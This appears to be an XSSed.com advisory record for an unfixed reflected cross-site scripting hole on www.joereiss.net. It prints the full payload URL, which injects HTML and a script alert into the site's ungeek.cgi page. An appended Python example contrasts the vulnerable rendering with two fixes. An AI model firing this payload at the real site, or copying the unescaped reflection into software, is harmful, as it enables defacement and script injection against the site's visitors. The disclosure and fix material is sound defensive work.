Unfixed XSS vulnerability at www.joereiss.net

2011-04-27T00:00:00
ID XSSED:72875
Type xssed
Reporter Kn0t
Modified 2011-11-12T00:00:00

Description

Security researcher Kn0t submitted on 27/04/2011 a cross-site scripting (XSS) vulnerability affecting www.joereiss.net, which at the time of submission ranked 2923685 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.joereiss.net/geek/ungeek.cgi?%3C/code%3E%3Ccenter%3E%3Ch1%3EXSS%20by%20Kn0t%3C/h1%3E%3Cbr/%3E%3Cimg%20src='http://kn0t.doesntexist.org/wp-avt.png'%3E%3Cbr/%3E%3Ctable%20width='500'%3E%3Ctr%3E%3Ctd%3E%3Cdiv%20align='justify'%3EThere's%20an%20XSS%20vulnerability%20in%20your%20geek-decoding%20system.%20This%20vuln%20afflicts%20the%20page%20%3Ci%3E/geek/ungeek.cgi%3C/i%3E,%20because%20it%20prints%20variables%20without%20clear%20them%20from%20special%20symbols%20that%20can%20be%20JavaScript%20or%20HTML.%20This%20variables%20are%20passed%20by%20the%20page%20%3Ci%3E/geek/ungeek.html%3C/i%3E.%20The%20user%20can%20insert%20his%20Geek%20Code,%20then%20this%20cgi%20page%20works%20with%20it,%20returning%20the%20meaning.%20The%20code%20is%20passed%20from%20ungeek.html%20to%20ungeek.cgi,%20using%20a%20GET%20request%20(www.joereiss.net/geek/ungeek.cgi?THAT'S%20WHAT%20I'M%20SAYING)%20and%20printing%20without%20values.%20You%20can%20do%20two%20things%20to%20fix%20this%20vulnerability:%3Cbr/%3E1)%20Using%20the%20PHP%20function%20%3Ci%3Ehtmlspecialchars();%3C/i%3E%20to%20check%20the%20possibility%20of%20HTML%20code%20injection.%3Cbr/%3E2)%20You%20can%20replace%20the%20%22%3C%22%20char%20with%20a%20NULL,%20so%20you%20can%20decode%20your%20Geek%20Code%20without%20a%20risk%20of%20HTML%20injection%20or%20Javascript%20XSS's.%3Cbr/%3E%3Cbr/%3EKn0t%20%22Bubba%22%20Nuanda%20~%20%3Ca%20href='http://kn0t.doesntexist.org/'%3EDUNNO%3C/a%3E%3C/div%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ealert(%22XSS%20by%20Kn0t%22)%3C/script%3E%3C/center%3E%3C!--
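The report embedded in the URL above describes a CGI page that reflects its GET query string into the response without encoding it, and names two fixes: an htmlspecialchars-style escape, or stripping the "<" character. The following is an added example written for this record, not code from xssed.com or from joereiss.net, and it assumes a hypothetical handler that treats the whole query string as the submitted Geek Code (as the report describes). It shows the vulnerable rendering beside both proposed fixes on a constructed input, so the difference between the two mitigations is visible.

```python
"""Reflected query-string rendering: vulnerable form beside two fixes.

Added example for this advisory record (assumption: a hypothetical CGI
that reflects its whole query string, as the report describes). Nothing
here is the original site's code.
"""
import html
from urllib.parse import unquote_plus

# Constructed sample query string: a Geek Code fragment followed by an
# injected script tag, URL-encoded the way a browser would send it.
SAMPLE_QUERY = "GCS%2Fd%2B%2B%3Cscript%3Ealert(1)%3C%2Fscript%3E"


def decode_geek_code(query_string: str) -> str:
    """Hypothetical input step: the CGI takes the raw query string as the code."""
    return unquote_plus(query_string)


def render_unsafe(code: str) -> str:
    """Vulnerable: the decoded parameter is reflected verbatim into HTML.

    Any '<' in the input starts a new element, which is exactly how the
    report's payload closes the <code> element and adds its own markup.
    """
    return f"<html><body><h1>Your Geek Code</h1><code>{code}</code></body></html>"


def render_strip_lt(code: str) -> str:
    """Fix 2 from the report: drop every '<' so no new tag can be opened.

    Adequate for this element-content context, but it does not neutralise
    quotes or '&', so it would not protect an attribute context.
    """
    return f"<html><body><h1>Your Geek Code</h1><code>{code.replace('<', '')}</code></body></html>"


def render_safe(code: str) -> str:
    """Fix 1 from the report: htmlspecialchars-equivalent output encoding.

    html.escape(quote=True) converts & < > " and ' to entities, so the
    browser displays the submitted text instead of interpreting it.
    """
    return f"<html><body><h1>Your Geek Code</h1><code>{html.escape(code, quote=True)}</code></body></html>"


def contains_injected_tag(page: str) -> bool:
    """Defender's check: does the rendered page carry a live <script> element?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    code = decode_geek_code(SAMPLE_QUERY)
    for name, renderer in (("unsafe", render_unsafe),
                           ("strip_lt", render_strip_lt),
                           ("escaped", render_safe)):
        page = renderer(code)
        print(f"{name:9s} injected tag present: {contains_injected_tag(page)}")
```

Escaping is the fix to prefer: it preserves the user's text exactly (a Geek Code can legitimately contain "<" and ">" as rating markers, which the strip approach would silently drop) while making every reflection context safe.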